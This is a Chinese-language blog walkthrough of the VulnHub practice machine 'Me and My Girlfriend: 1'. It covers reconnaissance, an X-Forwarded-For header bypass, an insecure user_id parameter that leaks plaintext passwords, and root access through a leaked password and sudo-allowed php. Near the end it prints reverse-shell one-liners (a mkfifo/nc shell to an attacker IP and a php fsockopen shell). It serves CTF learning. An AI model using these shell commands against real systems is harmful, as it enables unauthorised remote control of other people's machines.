No.47-VulnHub-Me and My Girlfriend: 1-Walkthrough渗透学习

**

VulnHub-Me and My Girlfriend: 1-Walkthrough

**

靶机地址:https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/
靶机难度:中级(CTF)
靶机发布日期:2019年12月13日
靶机描述:
自Bulldog Industries遭受数次数据泄露以来已经过去了三年。在那时,他们已经恢复并重新命名为Bulldog.social,这是一家新兴的社交媒体公司。您可以接受这一新挑战并在他们的生产Web服务器上扎根吗?
这是标准的启动到根。您唯一的目标是进入根目录并查看祝贺消息,该如何操作取决于您!
难度:中级,有些事情您可能从未见过。仔细考虑所有问题:)
作者:大余
时间:2020-02-07
请注意:对于所有这些计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为解决该CTF的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

一、信息收集

No.47-VulnHub-Me and My Girlfriend: 1-Walkthrough渗透学习_第1张图片
我们在VM中需要确定攻击目标的IP地址,需要使用nmap获取目标IP地址:
No.47-VulnHub-Me and My Girlfriend: 1-Walkthrough渗透学习_第2张图片
我们已经找到了此次CTF目标计算机IP地址:192.168.56.142
No.47-VulnHub-Me and My Girlfriend: 1-Walkthrough渗透学习_第3张图片
nmap发现22、80端口开放着…
No.47-VulnHub-Me and My Girlfriend: 1-Walkthrough渗透学习_第4张图片
该WEB只能在本地访问…
No.47-VulnHub-Me and My Girlfriend: 1-Walkthrough渗透学习_第5张图片
是使用x-forwarded-for标头访问页面的…
No.47-VulnHub-Me and My Girlfriend: 1-Walkthrough渗透学习_第6张图片
No.47-VulnHub-Me and My Girlfriend: 1-Walkthrough渗透学习_第7张图片
利用burpsuite分析发现,利用x-forwarded-for注入可以正常访问,但是每次点下页面都需要注入一次很烦…就下载了插件…
No.47-VulnHub-Me and My Girlfriend: 1-Walkthrough渗透学习_第8张图片
在注册页面注册了dayu用户密码…因为dirb、nikto、gobuster和wfuzz枚举出来的页面都没啥有用的信息,跳过…
可以看到配置文件标题表示为user_id,对于dayu用户,它在URL中显示user-id=12…
No.47-VulnHub-Me and My Girlfriend: 1-Walkthrough渗透学习_第9张图片
No.47-VulnHub-Me and My Girlfriend: 1-Walkthrough渗透学习_第10张图片
这边我前面利用sqlmap测试了,并尝试使用LFI,都没效果…
这边可以看到我把12改成了1,选择Profile,出现了eweuhtandingan用户名…密码是密文,我尝试在前端源码修改下能否看到…
No.47-VulnHub-Me and My Girlfriend: 1-Walkthrough渗透学习_第11张图片
No.47-VulnHub-Me and My Girlfriend: 1-Walkthrough渗透学习_第12张图片
passwd修改为text,可以看到明文出现了:skuyatuh,用户:eweuhtandingan
No.47-VulnHub-Me and My Girlfriend: 1-Walkthrough渗透学习_第13张图片
获得用户名:aingmaung 密码:qwerty!!!
No.47-VulnHub-Me and My Girlfriend: 1-Walkthrough渗透学习_第14张图片
回到最初作者给的提示,可以看到存在Alice用户,直接找到即可…
No.47-VulnHub-Me and My Girlfriend: 1-Walkthrough渗透学习_第15张图片
成功找到用户:alice,密码:4lic3

二、提权

No.47-VulnHub-Me and My Girlfriend: 1-Walkthrough渗透学习_第16张图片
Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}
经过查看,在进来的目录下有两个隐藏文件,进入cache是空的,在my_secret下正常获得了flag1…
No.47-VulnHub-Me and My Girlfriend: 1-Walkthrough渗透学习_第17张图片
我本来想看看html下有什么PHP或者shell能直接利用的…发现了三个隐藏文件,分析下…
No.47-VulnHub-Me and My Girlfriend: 1-Walkthrough渗透学习_第18张图片
???这里看到了root疑似密码:ctf_pasti_bisa,ceban_corp应该是数据库密码? …等会试试,先继续看看…
No.47-VulnHub-Me and My Girlfriend: 1-Walkthrough渗透学习_第19张图片
在halamanPerusahaan隐藏文件中没啥利用的…
No.47-VulnHub-Me and My Girlfriend: 1-Walkthrough渗透学习_第20张图片
在misc中php文件的意思就是访问login或者register是login就执行…等等…没啥用
No.47-VulnHub-Me and My Girlfriend: 1-Walkthrough渗透学习_第21张图片
这里尝试了三个密码,就只有ctf_pasti_bisa正确登录了…
No.47-VulnHub-Me and My Girlfriend: 1-Walkthrough渗透学习_第22张图片
这些信息都是知道的…没啥用!!!
No.47-VulnHub-Me and My Girlfriend: 1-Walkthrough渗透学习_第23张图片
Thanks! Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}
数据库没发现好的信息…直接尝试进root用户,发现成功…成功获得了root权限和查看了flag1和2…
这边前面进来我就习惯的sudo-l,发现还有另外提权的方法,继续讲…
No.47-VulnHub-Me and My Girlfriend: 1-Walkthrough渗透学习_第24张图片
(root) NOPASSWD: /usr/bin/php
可以看到这里的php可以提权…将php置于交互模式,并执行一个反向shell即可提权…go (这里shell随便写就是,非常多方法)
No.47-VulnHub-Me and My Girlfriend: 1-Walkthrough渗透学习_第25张图片
命令:sudo .... -a
命令:echo shell_exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.56.103 443 >/tmp/f");
成功提权…另附上:php提权参考链接

推荐链接里的:php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'
挺好用的,或者CMD等等…

这边我使用了两种方法来提权…我分析了会,没发现别的方法了,如果有别的未发现的,希望能告知我,谢谢,一起学习,加油!!!

由于我们已经成功得到root权限查看flag,因此完成了简单靶机,希望你们喜欢这台机器,请继续关注大余后期会有更多具有挑战性的机器,一起练习学习。

如果你有其他的方法,欢迎留言。要是有写错了的地方,请你一定要告诉我。要是你觉得这篇博客写的还不错,欢迎分享给身边的人。

在这里插入图片描述

你可能感兴趣的:(python,linux,大数据,数据库,java)